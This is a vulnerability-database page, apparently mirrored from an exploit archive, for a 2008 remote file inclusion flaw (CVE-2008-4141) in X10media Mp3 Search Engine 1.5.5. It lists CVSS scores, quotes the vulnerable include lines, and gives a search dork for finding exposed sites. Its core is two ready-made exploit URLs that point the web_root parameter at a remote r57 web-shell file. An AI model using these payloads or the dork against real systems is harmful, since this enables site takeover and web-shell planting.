Bug: X10media Mp3 Search Engine 1.5.5 Remote File Inclusion Vulnerability ( Ascii Version )

Search:
WLB2

X10media Mp3 Search Engine 1.5.5 Remote File Inclusion Vulnerability

Published
Credit
Risk
2008.09.25
THUNDER
High
CWE
CVE
Local
Remote
CWE-94
CVE-2008-4141
No
Yes
 Dork: "This search engine is in no way intended for illegal downloads."

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

################## THUNDER #########################################################
#
#
# X10media Mp3 Search Engine v1.5.5 Remote File Inclusion Vulnerability
#
# Founded by : THUNDER <t4h[at]hotmail.fr>
# Dork: "This search engine is in no way intended for illegal downloads."
#
##### Vuln Code: ###################################################################
#
# file : /includes/function_core.php
# -88.- include ($web_root."js/Mp3Player.php");
#
#-----------------------------------------------------------------
#
# file : /templates/layout_lyrics.php
# .5.- include ($web_root."includes/function_list.php");
#
###### Exploit #####################################################################
#
# http://www.target.com/[path]/includes/function_core.php?web_root=http://127.0.0.1/r57.txt?
#
# http://www.target.com/[path]/templates/layout_lyrics.php?web_root=http://127.0.0.1/r57.txt?
#
#
#
###### Greets #######################################################################
#
# MoRoCcan InjEctor5 Te4m and All Hackers
#
####################################################################################

References:

http://www.securityfocus.com/bid/31225
http://www.milw0rm.com/exploits/6480
http://www.frsirt.com/english/advisories/2008/2608

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version